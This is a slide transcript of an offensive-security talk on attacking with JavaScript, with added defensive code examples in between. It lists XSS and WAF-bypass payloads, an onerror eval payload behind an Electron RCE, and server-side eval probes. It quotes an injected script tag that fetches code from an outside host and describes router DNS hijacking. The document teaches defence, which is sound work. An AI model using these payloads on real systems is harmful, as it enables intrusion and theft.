Captain Marvellous JavaScript - JSFoo Coimbatore 2019


This talk was presented at JSFoo Coimbatore 2019.

The talk introduces developers to the versatility of JS from an attacker's point of view. It covers examples of how JS can be used to detect vulnerabilities, build payloads, and reliably exploit software, infrastructure and humans alike.

The talk covers the following areas from an offensive security point of view:
- Using BeEF to extend XSS attacks
- Mutation XSS and the recently discovered Google XSS vector (why it worked)
- Server side JS attacks and remote code execution
- JS and desktop applications, code execution and vulnerabilities
- Breaking filters and WAFs using altered representations of JS and its objects
- Malware and JS obfuscation
- Using JS to fuzz browsers and earn money
- Attacking network devices (home routers and switches) using JavaScript


riyazwalikar

July 05, 2019

Transcript

  1. 1.

    CAPTAIN MARVELLOUS JAVASCRIPT – A look at the versatility of JS and how hackers use it
  2. 2.

    ABOUT ME?
    • Riyaz Walikar, Chief Hacker @Appsecco
    • Several years of security experience in breaking things (Offensive Security)
    • All kinds of things (applications/mobile/systems/networks/wireless/cloud)
    • Love to travel, do photography and stargaze
    • Comic nerd
    Appsecco – https://appsecco.com @appseccouk
  3. 3.

    WHAT IS THIS TALK ABOUT?
    • The versatility of JS and its application in unorthodox circumstances and in offensive use cases
    • JavaScript is everywhere. As much as it is used to build stuff, several use cases exist where hackers use JS to break stuff as well
    • We will look at examples from computer security where JS is used to detect vulnerabilities, build payloads, and reliably exploit software, infra and humans alike
    • This talk is meant to introduce the audience to the various applications of JS (or its variations) from an attacker's point of view and provide real world examples while doing so
  4. 4.

    JAVASCRIPT AND XSS: IS THAT IT? – I confirmed when you prompted for an alert
  5. 6.

    WE ALL KNOW
    • XSS occurs when user-controlled data is reflected back in the browser as-is and is then processed by the browser's JS engine
    • This user-controlled data, when run in the browser's JS engine, will have the same capabilities as developer-written JS
  6. 7.

    WHAT XSS IS CAPABLE OF
    • How most developers see XSS
    • How most attackers see XSS
    Image sources: https://www.polygon.com/2017/5/17/15624888/guardians-of-the-galaxy-vol-2-mantis-wrong and https://www.looper.com/63592/untold-truth-baby-groot/
  7. 8.

    WHAT CAN YOU DO WITH XSS?
    • XSS can be used to (not an exhaustive list):
      – Read and send session data elsewhere
      – Read secrets in the DOM
      – Redirect users to malware infested sites / pornographic content
      – Steal the system CPU time to mine bitcoins
      – Steal keyboard keys (credentials)
      – Browser exploitation and Remote Code Execution
      – Phishing attacks / framing content
      – Hack into internal routers and update the DNS or gateway IP to steal all network traffic
  8. 9.

    I'VE GOT NO BEEF WITH YOU!
    • Automated tool to work with XSS-infected zombies (browsers)
    • Features of BeEF (Browser Exploitation Framework):
      – Browser and OS fingerprinting
      – User behaviour fingerprinting and social engineering
      – Fake Flash update to install a rogue extension
      – Identify internal IP address
      – Port scanner, network map creation
      – Run Metasploit modules to perform exploitation
      – Tunnel traffic through the browser
      – Geolocation of the browser
  9. 10.
  10. 11.
  11. 13.

    MUTATION XSS – Not cancerous but more like Jean Grey
  12. 14.

    MUTATION WHAT?
    • Mutation XSS, first described by Mario Heiderich in 2013, is a technique that relies on browser engines mutating strings when they are placed inside an innerHTML context
    • The earliest known example was found by a researcher called Yosuke Hasegawa in IE's innerHTML in 2007
    • He noticed that in IE, an element's attribute bled into the document when using Print Preview if the attribute contained backticks
  13. 15.

    • IN:  <img src="foo" alt="``onerror=alert(1)"/>
    • OUT: <img alt=``onerror=alert(1) src="foo">
    https://tenor.com/view/what-thor-confused-chris-hemsworth-gif-13355644
  14. 16.

    MUTATION WHAT?
    • Basically, user-controlled input is innocuous as it passes through server filters, client filters, WAF, browser protections etc., but is made malicious by the browser when injected into innerHTML
    • Over the years, multiple vectors have been discovered that can be used to trick browsers into rendering malicious content while passing through filters and protections as harmless strings
  15. 17.

    CS: THE GOOGLE XSS
    • Most attackers dream of getting an XSS on the Google home page via the search bar
  16. 18.

    CS: THE GOOGLE XSS – BACKGROUND
    • On Sept 26 2018, a developer working on the Closure library created a commit that removed part of the input sanitisation. The Google Search bar uses the Closure library
    • In Feb 2019, Masato Kinugawa discovered that this allowed a mutation to occur when a noscript tag was used with malformed HTML. The Closure library would parse the input via a template element and render it via a div's innerHTML
    • To understand this better, let's take a look at how browsers mutate broken HTML
  17. 19.

    CS: THE GOOGLE XSS – BROWSER MUTATIONS
    • Save this as a.html: <div><script title="</div>">
    • Save this as b.html: <script><div title="</script>">
    • Open both in Chrome and view the console for the rendered source
  18. 21.

    CS: THE GOOGLE XSS – THE NOSCRIPT TAG MUTATION
    • The Closure library utilised the template tag to obtain safe HTML, which was then passed to a div
    • The `template` element does not parse JS but a `div` does
    • If we pass a `<noscript>` tag containing a broken noscript tag and an XSS vector, the noscript tag would be parsed by `template` and then by `div`, causing the XSS to trigger
  19. 23.

    SERVER SIDE JS ATTACKS – Let's give JS full access to server resources, said no one ever
  20. 24.

    “User supplied data should never be used inside an execution context without first checking if the data has any special meaning within that context”
    - Every programming language ever
    https://www.businessinsider.in/The-best-part-of-the-Captain-Marvel-trailer-has-now-become-a-hilarious-meme/articleshow/65875962.cms
  21. 25.

    THE PERILS OF SERVER SIDE USER CODE
    • Where is the data coming from?
    • Where will the data be processed?
    • Will the function processing the data validate that the data is benign within its context?
    • Server side processing has access to the OS and its resources
    • User supplied data may be able to traverse server side objects and reach functions that would otherwise remain hidden/protected
  22. 26.

    SERVER SIDE JS INJECTION – SPOT THE BUG
    • A Server Side JavaScript Injection occurs when user input is passed to a server function that performs a JS eval. This could be done through multiple JS functions like eval(), setTimeout(), setInterval() and Function()
  23. 27.

    DEMO: REMOTE CODE EXECUTION
    • Crudely written webservice (remember I'm not a dev ☺)
    • Try it out from here: https://github.com/appsecco/vulnerable-apps/tree/master/node-simple-rce
    • Has multiple routes that perform multiple functions
    • Written in nodejs (express) with a MongoDB backend
    • Quick test cases to check if user input ends up in an eval context:
      – Math: 5-4
      – JS objects: undefined, String
      – Response objects: res, resp, response, rs
    • Then load other modules using require and use res.send to receive the output
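The two slides above describe the bug class and the probes used to detect it. The following is an added example, not code from the talk or from the appsecco/vulnerable-apps node-simple-rce service: a user-controlled "discount" value handled the vulnerable way (straight into eval) and the safe way (parsed as the number the feature actually needs), with the slide's probe strings used as a self-test against both handlers. Express and MongoDB are left out; the handlers take the raw query-string value as a plain string, and all function names are this example's own.

```javascript
// Vulnerable form, kept as the slide describes it: the string goes straight
// into eval(), so arbitrary JS runs with the server process's privileges.
// setTimeout(str), setInterval(str) and Function(str) are the same bug.
function vulnerableDiscount(userInput) {
  return eval(userInput); // eslint-disable-line no-eval
}

// Safe form: the feature only ever needs a number, so parse exactly that and
// reject everything else. No code path interprets the input as JavaScript.
function safeDiscount(userInput) {
  if (typeof userInput !== "string" || !/^\d+(\.\d+)?$/.test(userInput.trim())) {
    throw new TypeError("discount must be a plain decimal number");
  }
  const value = Number(userInput.trim());
  if (value > 100) {
    throw new RangeError("discount must be between 0 and 100");
  }
  return value;
}

// The detection probes from the slide. Run against your own endpoint they
// tell eval-like handling apart from parsing or echoing: "5-4" coming back
// as 1 means the input was evaluated, not treated as data.
const PROBES = ["5-4", "undefined", "String", "typeof res"];

// Feed every probe to a handler and record what came back (or which error
// rejected it). Output is a plain object so it can be compared in tests.
function probeHandler(handler) {
  const outcome = {};
  for (const probe of PROBES) {
    try {
      outcome[probe] = String(handler(probe));
    } catch (err) {
      outcome[probe] = `rejected (${err.constructor.name})`;
    }
  }
  return outcome;
}

// True when the arithmetic probe was evaluated rather than rejected/echoed.
function looksLikeSsji(outcome) {
  return outcome["5-4"] === "1";
}

// Stand-alone run: compare both handlers side by side.
console.log("vulnerable:", probeHandler(vulnerableDiscount));
console.log("safe:      ", probeHandler(safeDiscount));
```

The probe for `typeof res` shows why the slide lists response objects: in a handler where `res` is in scope, an evaluated probe returns `"object"` instead of `"undefined"`, confirming that the server's own objects are reachable from the injected expression.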
  24. 29.

    MIXING DESKTOP CLIENTS AND JAVASCRIPT (WCGW)
    • JavaScript is now on the desktop via Electron
    • Electron = Chromium front-end + NodeJS backend = pseudo-native, platform-agnostic app
    • A lot of commonly used applications have now been ported to Electron
    • So from an attacker's point of view:
      – You have an app running on your desktop
      – To which I can send input (via a message, network traffic, hosted content, shared file or any feature)
      – The app uses JS to parse user-provided input
      – WCGW
  25. 30.

    SOME ELECTRON APPS
    • Visual Studio Code (FTW)
    • Slack
    • Skype
    • LosslessCut
    • Waiterio Restaurant POS
    • Microsoft Teams
    • Snipline
    • Windows 95
  26. 32.

    CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP
    • AttackSurfaceAnalyzer (ASA) is a tool that takes a snapshot of your system state before and after the installation of other software product(s) and displays changes to a number of key elements of the system attack surface
    • ASA uses Electron.NET, which is a wrapper around a "normal" Electron application with an embedded ASP.NET Core application. Electron APIs are invoked from .NET over an Electron.NET IPC bridge
    • An RCE was discovered in ASA due to the infamous NodeIntegration flag being set to true
    • This allows a JavaScript payload to spawn processes on the target
  27. 33.

    CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP – WHAT WAS THE ISSUE AND THE EXPLOIT?
    • The NodeIntegration flag was set to true in WebPreferences.cs
    • This allows calling of other modules like process_wrap or child_process
    • An XSS can therefore result in server side (host) code execution
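As an added example, not code from AttackSurfaceAnalyzer, Electron.NET or the talk, here is a JavaScript audit of the `webPreferences` object handed to an Electron `BrowserWindow`, which is the renderer-side counterpart of the flag the slide places in WebPreferences.cs. The option names (`nodeIntegration`, `contextIsolation`, `sandbox`, `webSecurity`, `allowRunningInsecureContent`) are real Electron keys; the severities, the hardened baseline and the sample configuration are this example's own choices, and the sample is constructed to resemble the situation described, not copied from ASA.

```javascript
// Explicit values expected in a hardened window. Any window that renders
// remote or user-supplied content should be configured like this.
function hardenedWebPreferences() {
  return {
    nodeIntegration: false,            // renderer gets no require()/process
    contextIsolation: true,            // preload APIs live in a separate JS world
    sandbox: true,                     // Chromium OS sandbox for the renderer
    webSecurity: true,                 // keep the same-origin policy on
    allowRunningInsecureContent: false // no plain-HTTP scripts on HTTPS pages
  };
}

// One finding per dangerous or missing setting. `prefs` is the object that
// would be passed as `new BrowserWindow({ webPreferences: prefs })`.
function auditWebPreferences(prefs) {
  const findings = [];
  const flag = (option, severity, note) => findings.push({ option, severity, note });

  if (prefs.nodeIntegration === true) {
    flag("nodeIntegration", "high",
      "renderer JS can require() Node modules such as child_process; any XSS in this window is code execution on the host");
  }
  if (prefs.contextIsolation !== true) {
    flag("contextIsolation", "medium",
      "page scripts share a JS world with the preload script and can reach whatever it exposes");
  }
  if (prefs.sandbox !== true) {
    flag("sandbox", "medium", "renderer runs without the Chromium OS sandbox");
  }
  if (prefs.webSecurity === false) {
    flag("webSecurity", "high", "same-origin policy disabled: any loaded page can read any origin");
  }
  if (prefs.allowRunningInsecureContent === true) {
    flag("allowRunningInsecureContent", "medium", "HTTPS pages may load and run plain-HTTP scripts");
  }
  return findings;
}

// Worst severity in a set of findings, "none" when the audit is clean.
function highestSeverity(findings) {
  const rank = { none: 0, low: 1, medium: 2, high: 3 };
  return findings.reduce(
    (worst, f) => (rank[f.severity] > rank[worst] ? f.severity : worst),
    "none"
  );
}

// Constructed sample in the shape the slide describes: nodeIntegration
// switched on and nothing else set, so the other protections are absent too.
const sampleVulnerablePrefs = { nodeIntegration: true };

// Stand-alone run: print both audits.
console.log("sample:  ", auditWebPreferences(sampleVulnerablePrefs));
console.log("hardened:", auditWebPreferences(hardenedWebPreferences()));
```

In a review this is the check to run over every `BrowserWindow` and `webview` the application creates; the `nodeIntegration` finding alone is what turns the HTML injection on the next slide into process creation on the host.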
  28. 34.

    CS: CODE EXECUTION USING JAVASCRIPT IN A DESKTOP APP – TRIGGERING THE PAYLOAD AND CODE EXEC
    • Using an encoder to convert to either base64 or charCode, the entire payload can be passed via an onerror trigger
    • <img src=x onerror=eval(encoded_payload)>
  29. 35.
  30. 36.

    CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET
    • Electron was vulnerable to a protocol handler vulnerability affecting apps that use custom protocol handlers
    • Assigned CVE-2018-1000006
    • Basically, Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, are vulnerable
    • A ton of apps became vulnerable due to the way the protocol handler could be used to pass additional parameters to the Chromium window running the app
    • Example of this bug in Exodus, a cryptocurrency wallet app
  31. 37.

    CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET – THE BUG
    • Exodus registers a protocol handler, exodus://, which when invoked would launch the app
    • Browsing to a page containing the following code would result in Exodus launching with the command line args provided
  32. 38.

    CS: RCE VIA COMMAND LINE ARGS IN EXODUS WALLET – THE EXPLOIT
    • Using the list at https://peter.sh/experiments/chromium-command-line-switches/, a command line switch was identified that would allow a custom program to be launched
  33. 39.

    CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER
    • A quoted reply on Signal led to evaluation of HTML content
    • Signal internally uses React to render UI elements in the Chromium window
    • The issue was in how the renderText() function in Quote.tsx set the HTML in the window
  34. 40.

    CS: HTML INJECTION IN SIGNAL VIA REACT HANDLER – THE EXPLOIT
    • As the exploit relies on the user quoting a message containing valid HTML, an attacker could send messages containing HTML elements rendered as literals
    • When this is quoted in a reply, the HTML could be made to become part of the window and an innerHTML could cause execution
    • No public PoC was released; however, a message such as the following would work in this context
  35. 41.

    BREAKING FILTERS AND WAFS? – Why blacklists don't matter
  36. 42.

    COMMON BYPASSES
    • JS objects, variables and functions can be represented in many forms
    • If the PoC is to generate an alert box, several different forms of calling alert work
    • Depending on the filter being targeted, you need to analyse the output that is received for various mutations of the input
    • Primarily, the following forms of manipulation can be tried:
      – Representing an object differently
      – Using encoding techniques
      – String and object manipulation to access functions and attributes
      – Relying on browser and JS engine implementations to transform innocuous objects
  37. 43.

    COMMON BYPASSES
    • Some of the more common representations and usages include the following cases:
      – alert(/xss/)
      – eval("ale"+"rt(0)")
      – Function("aler"+"t(0)")()
      – onerror="alert;throw 1"
      – onerror=eval;throw'=confirm\x281\x29';
      – javascript:\u0061lert&#x28;1&#x29
      – <input onfocus=alert(document.cookie) autofocus>
      – eval(17795081..toString(36)+"(0)")
      – " onmouonmouseoverseover=alalertert(0)
      – self['\x61\x6c\x65\x72\x74']('\x58\x53\x53')
  38. 44.

    JS WEIRDNESS (FOR ATTACKERS)
    • JS can get real weird real quick for attackers, and different representations can be used as attack payloads
    • It's perfectly legal JS, but due to the representation itself it appears weird™
    • Using an obscure form of JS representation called JSFuck, you can create objects, strings and other entities ready for execution without using letters or numbers
    • It uses only six different characters to write and execute code: ()+[]!
  39. 48.

    BREAKING FILTERS/WAFS
    • Depending on the context where reflection is occurring, different forms of input can be tried
    • For dynamic filters that strip away blacklisted words like onmouseover, onload etc., the following test cases can be applied:
      – " onmouonmouseoverseover=alalertert(0
      – <svg/onloloadad="al+"ert(0)">
      – " ontouch=alert(0)
    • Some filters may not detect payloads sent using newline or whitespace characters:
      – " name=test%0d%0a<script>alert(0)</script>
    • If the WAF/filter allows Unicode representation to pass through, you could use something like:
      – xss\"\u003E\u003Ch1 onmous\u0045over=al\u0065r\u0074(domain)\u003EPayload\u003C/h1\u003E
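To make concrete why the section is titled "why blacklists don't matter", here is an added example (not from the talk or any WAF product) that runs the slide's own three test strings through two constructed word-stripping filters and then through the approach that actually holds up, contextual output encoding. The blacklist contents and every function name are this example's assumptions; the test strings are the ones on the slide.

```javascript
// Constructed blacklist of the kind a "dynamic filter" strips out.
const BLACKLIST = ["onmouseover", "onload", "onerror", "alert", "script"];

// Filter mistake 1: strip each word once. Nesting a word inside itself
// survives, because removing the inner copy re-assembles the outer one.
function stripOnce(input) {
  let out = input;
  for (const word of BLACKLIST) {
    out = out.replace(new RegExp(word, "i"), ""); // non-global: first hit only
  }
  return out;
}

// Filter mistake 2: strip until nothing changes. This beats the nesting
// trick but still misses any handler name that is not on the list, and any
// text that is encoded when filtered and only decoded later by the browser.
function stripUntilStable(input) {
  let prev;
  let out = input;
  do {
    prev = out;
    for (const word of BLACKLIST) {
      out = out.replace(new RegExp(word, "ig"), "");
    }
  } while (out !== prev);
  return out;
}

// What the JS engine sees if the filtered text lands inside a JS string
// literal: \" and \uXXXX are resolved after the filter has already run.
function decodeAsJsStringLiteral(text) {
  return JSON.parse(`"${text}"`);
}

// The fix: encode for the output context instead of hunting for bad words.
// Inside a double-quoted HTML attribute only these characters carry meaning,
// so once they are encoded the value cannot close the attribute or the tag.
function encodeForAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// A reflected field rendered with the encoder applied.
function renderNameField(userValue) {
  return `<input name="${encodeForAttribute(userValue)}">`;
}

// The three test cases from the slide (constructed here as string literals).
const NESTED = '" onmouonmouseoverseover=alalertert(0';
const UNLISTED = '" ontouch=alert(0)';
const UNICODE = String.raw`xss\"\u003E\u003Ch1 onmous\u0045over=al\u0065r\u0074(domain)\u003EPayload\u003C/h1\u003E`;

// Stand-alone run: what each filter leaves behind, and the encoded output.
for (const [name, input] of [["nested", NESTED], ["unlisted", UNLISTED], ["unicode", UNICODE]]) {
  console.log(name, "| stripOnce:", stripOnce(input));
  console.log(name, "| stripUntilStable:", stripUntilStable(input));
}
console.log("unicode after JS string decoding:", decodeAsJsStringLiteral(UNICODE));
console.log("encoded for attribute:", renderNameField(NESTED));
```

Two things stand out when this runs. The Unicode case passes both filters byte-for-byte unchanged and only becomes `onmousEover=alert(domain)` once the engine decodes the string literal, and since HTML attribute names are case-insensitive that handler fires; the filter and the interpreter simply disagree about what the bytes mean. The encoder, by contrast, never needs to know what an event handler is: with `"` turned into `&quot;`, the nested payload stays a harmless attribute value.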
  40. 49.

    MALWARE, JAVASCRIPT AND OBFUSCATION – You will not believe what happened next
  41. 50.

    MALWARE AND THE INTERNET
    • Almost all modern malware infections, social engineering attempts, phishing and targeted ad campaigns are now delivered through the Internet
    • Attackers compromise high traffic websites, inject malicious JavaScript as part of the page or add an iframe that redirects the user to a phishing site or simply prompts them to download and run “antivirus software”
    • The compromise may have been done using a Stored XSS, a weak admin password, a server side code execution vulnerability or the usage of a vulnerable library hosted on a CDN
    • Attackers also rely heavily on users' browsing habits, clickbaity articles and user belief in phishing emails to achieve what is known as a “drive by download” attack
  42. 53.
  43. 54.
  44. 55.

    CS: DRIVE BY DOWNLOADS – THE ATTACK CHAIN
    • Users are tricked into navigating to a site laden with JS that profiles the browser, addons, the OS and other plugins that may be active (think Flash, Java, Silverlight (?))
    • A legitimate site may also be affected with malicious JavaScript via a server side vulnerability or a compromised CDN
    • A weakness in the browser or third party components is exploited to download/run additional code without user interaction
    • The user may additionally/alternatively be phished to download and run a binary irrespective of a browser weakness
    • The binary, when run natively on the machine, gives complete access to the attacker, allowing them to manage the machine remotely or add it to a larger bot network
  45. 56.

    CS: DRIVE BY DOWNLOADS – AN EXAMPLE EXPLOIT – AOL SUPERBUDDY EXPLOIT
    • A legit site was infected with malicious JS via SQL Injection. The HTML code <script src="http://www.kjwd.ru/js.js"> was injected in all pages on the site
    • The script checks for a cookie to verify if the browser has been attacked before. If no cookie is found, a new cookie is set to mark the beginning of an exploit attempt
    • A new iframe is created using JS with 0 dimensions. This iframe loads another script from iroe.ru, which uses the User-Agent request-header field to detect the user's browser and operating system
    • The returned script uses obfuscation techniques and polymorphism to make analysis difficult
    • It uses location.href as a key to decode encoded strings, which makes static analysis difficult
  46. 57.

    CS: DRIVE BY DOWNLOADS – AN EXAMPLE EXPLOIT CONTD.
    • A sample of the partially deobfuscated code is shown below
    • The script attempts to execute 3 exploits in the if block, targeting different vulnerabilities
    • The code creates an ActiveXObject from the AOL SuperBuddy plugin; if successful it executes Exhne69P
    • The function loads shellcode onto the browser's heap through various string manipulations so that if the exploit is triggered, execution will land in the loaded shellcode (heap-spray method)
    • The actual exploit is triggered by invoking the LinkSBIcons method with a large integer, causing an overflow
  47. 58.

    USING JAVASCRIPT TO FUZZ BROWSERS – Now you see me, now you don't
  48. 59.

    BROWSER FUZZING?
    • Create HTML pages containing JavaScript that creates and destroys, and attempts to re-use, destroyed elements from the DOM (example)
    • Create several hundred/thousand mutations of these files as input to different browsers
    • Attempt to load them in a browser attached to a debugger to monitor memory access and system usage
    • A browser crash could mean access to a memory location or control of code flow due to the input HTML+JS page
    • May potentially lead to an info leak or remote code execution, or a vulnerability that could be further exploited
    • Many different automated engines/tools are available to fuzz browsers, most of them open source
  49. 60.

    TOOLS, BROWSER CRASHES AND THE $$$
    • Several popular tools like Domato and Grinder attempt to make browser fuzzing easier, even for novices
    • Many researchers have written their own tools, scripts, debuggers and other automation around fuzzing browsers
    • Browser fuzzing and exploitation is a lucrative industry
    • Several companies buy exploits from researchers, including browser vendors themselves
    • Events like Pwn2Own and other conferences provide cash prizes upwards of 40,000 USD to hackers who successfully hack major browsers
    • Browser vendors run Bug Bounty programs to safely patch vulnerabilities while paying researchers for their work and working exploits
  50. 61.
  51. 62.
  52. 63.

    ATTACKING NETWORK DEVICES USING JAVASCRIPT – admin admin and fun things
  53. 64.

    TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO
    • A user browses to a website using a browser like Chrome or Firefox
    • The browser loads a piece of JavaScript that uses WebRTC to compute the internal IP address of the machine
    • This IP is passed to another function that uses it to create the presumed gateway address and load an image
    • The image load URL has the default credentials in it, so the router's Basic Auth goes through
    • On successful load of the image, additional functions are called to set the internal DNS of the router and to make the admin console public
  54. 65.

    TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET

    • A simple HTML page example
  55. 66.

    TAKING OVER THE DNS OF A NETWORK – CODE SNIPPET

    • The bodyOnLoad function to retrieve the internal IP using WebRTC
  56. 67.

    TAKING OVER THE DNS OF A NETWORK – ATTACK SCENARIO

    • The bodyOnLoad function to retrieve the internal IP using WebRTC
  57. 68.

    WHAT COULD GO WRONG FROM HERE
    • Active and passive Man-in-the-Middle attacks
    • Phishing attacks to steal credentials by loading attacker-controlled domains
    • Botched program updates received from malicious domains allow direct compromise of the victim system(s)
    • The attacker has essentially full visibility and control of the target network
  58. 70.

    TO CLOSE
    • JS is not only used to build stuff but is actively used by attackers to do all sorts of cool things
    • Do not trust user input, anytime, anywhere
    • Patch your browsers, update your apps
    • Change default credentials, everywhere
    • Be wary of the sites you visit, the links you click and the attachments you open
    • There is no Nigerian prince who wants to give you money
  59. 71.
  60. 72.

    REFERENCES
    • https://github.com/beefproject/beef/wiki
    • https://cure53.de/fp170.pdf
    • https://www.youtube.com/watch?v=lG7U3fuNw3A
    • https://github.com/appsecco/dvna
    • https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/#vuln-3-xss-to-rce-via-nodeintegration
    • https://hackernoon.com/exploiting-electron-rce-in-exodus-wallet-d9e6db13c374
    • https://thehackerblog.com/i-too-like-to-live-dangerously-accidentally-finding-rce-in-signal-desktop-via-html-injection-in-quoted-replies/
    • https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
    • https://gist.github.com/xsscx/0e55b25f6b959bf572a9
    • https://support.google.com/webmasters/answer/3024344?hl=en
    • https://sites.cs.ucsb.edu/~vigna/publications/2010_cova_kruegel_vigna_Wepawet.pdf
    • https://blog.sucuri.net/2017/12/javascript-injection-creates-rogue-wordpress-admin-user.html
    • https://github.com/Escapingbug/awesome-browser-exploit
    • https://www.pentestpartners.com/security-blog/lan-surfing-how-to-use-javascript-to-execute-arbitrary-code-on-routers/
    • https://www.spamfighter.com/News-20220-Malware-Based-on-JavaScript-Attacks-DNS-Settings-of-Your-Router.htm
    • https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-devices-used-to-execute-dns-malware-against-home-routers/
  61. 73.

    THANK YOU!
    • Riyaz Ahemed Walikar
    • @riyazwalikar
    • @appseccouk
    • https://blog.appsecco.com
    • https://appsecco.com
    • https://ibreak.software